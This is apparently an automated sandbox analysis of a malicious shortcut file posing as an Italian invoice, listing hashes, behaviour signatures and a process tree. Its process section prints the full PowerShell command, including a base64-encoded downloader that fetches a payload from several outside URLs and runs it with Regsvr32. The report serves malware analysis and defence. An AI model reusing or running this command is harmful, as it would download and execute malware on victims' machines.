Analysis
-
max time kernel
93s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
20/11/2024, 05:21
Static task
static1
Behavioral task
behavioral1
Sample
d78e7c0d9e50043400028a135bbaac89a51400e93e60b4b648172f02ecb7e4e8.lnk
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
d78e7c0d9e50043400028a135bbaac89a51400e93e60b4b648172f02ecb7e4e8.lnk
Resource
win10v2004-20241007-en
General
-
Target
d78e7c0d9e50043400028a135bbaac89a51400e93e60b4b648172f02ecb7e4e8.lnk
-
Size
2KB
-
MD5
8a131467d9e8042496ee3fca5204dd38
-
SHA1
6b2466b6d395bd4ea9127c5a3597b27cfd7b0fe2
-
SHA256
d78e7c0d9e50043400028a135bbaac89a51400e93e60b4b648172f02ecb7e4e8
-
SHA512
d5fa629eb555c10c77712516f74917fe5dba3af366b000be823348beaa87cf52edfcbf20edd568f47ee9cf304f23d2433884ff40b362b3990f5369bf77423669
Malware Config
Signatures
-
Blocklisted process makes network request 7 IoCs
flow pid Process 12 2960 powershell.exe 18 2960 powershell.exe 29 2960 powershell.exe 34 2960 powershell.exe 36 2960 powershell.exe 47 2960 powershell.exe 48 2960 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation cmd.exe -
pid Process 4064 powershell.exe 2960 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 4064 powershell.exe 4064 powershell.exe 2960 powershell.exe 2960 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 4064 powershell.exe Token: SeDebugPrivilege 2960 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 3764 wrote to memory of 4064 3764 cmd.exe 84 PID 3764 wrote to memory of 4064 3764 cmd.exe 84 PID 4064 wrote to memory of 2960 4064 powershell.exe 86 PID 4064 wrote to memory of 2960 4064 powershell.exe 86
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\d78e7c0d9e50043400028a135bbaac89a51400e93e60b4b648172f02ecb7e4e8.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3764 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "Fattura N 0000210-19 XEX 26-04-2022.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cHM6Ly9rdXBvbmRpZ2l0YWwuc3Rvcm1hcHAuaW4vbWlkby1uaWN1LzlOU1JDZlpCLyIsImh0dHA6Ly9mYXJzY2hpZC5kZS92ZXJrYXVmc2JlcmF0ZXJfc2VydmljZS91QURKdy8iLCJodHRwOi8vN2dhbGxlcnkuY29tL2JiZWF1dHlfZG93bmxvYWQvSHBPanJqRXhBYjZQWS8iLCJodHRwOi8vZTV3ZWIuY29tLmJyL3dwLWNvbnRlbnQvNFRQRFVwcGIvIiwiaHR0cHM6Ly9kd3dtYXN0ZXIuY29tL3dwLWNvbnRlbnQvdGZOczFjckhZWmQ2RjUvIiwiaHR0cDovL2NsdWJtYW5hZ2VyLm5ldC5hci9wcnVlYmEvN2xsUjlxV2ZRZHFsbkltbGlVRS8iKTtmb3JlYWNoICgkdSBpbiAkbGlua3MpIHt0cnkge0lXUiAkdSAtT3V0RmlsZSAkZW52OlRFTVAvTHF3eGJQclpKei5MTW87UmVnc3ZyMzIuZXhlICRlbnY6VEVNUC9McXd4YlByWkp6LkxNbzticmVha30gY2F0Y2ggeyB9fQ==')) > "C:\Users\Admin\AppData\Local\Temp\sNhYaMMPOU.ps1"; powershell -executionpolicy bypass -file "$env:TEMP/\sNhYaMMPOU.ps1"; Remove-Item "$e2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4064 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -file C:\Users\Admin\AppData\Local\Temp/\sNhYaMMPOU.ps13⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2960
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
1KB
MD52a54ae28dd77de9cddb7d8d0a424d595
SHA1cb995b4e6c1a0e426e70341a4e76bbe31528b707
SHA256aa9a9bf78315144808b883edf47d98bf9649280536aae8d0056f7b614bbf4b8d
SHA51289590daaa5655896c175c1f80a92cb8d6e8bb44127aeeedcd7d71ce16165672dbe4d1df10feffb964fd7adc05ebab78df546fc7711a109ca129acd782f89fbd1
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
974B
MD580bbc5429910a67fdbbd22941e33b2b1
SHA1ad9daf9fcb9e16a9cc2dc62a531dd4586561e935
SHA256750b087ab0fbf4ffb077d571b2c4ff776ccbc17e043beb80dcf63f919fb2b9f2
SHA512cac158e88145753df2efca305605fead81d9aaaec0221580103364f521f9e99e87aa4cff6568c0f81a018d9d893d5041046f9528871c76df377b084fdfa584f0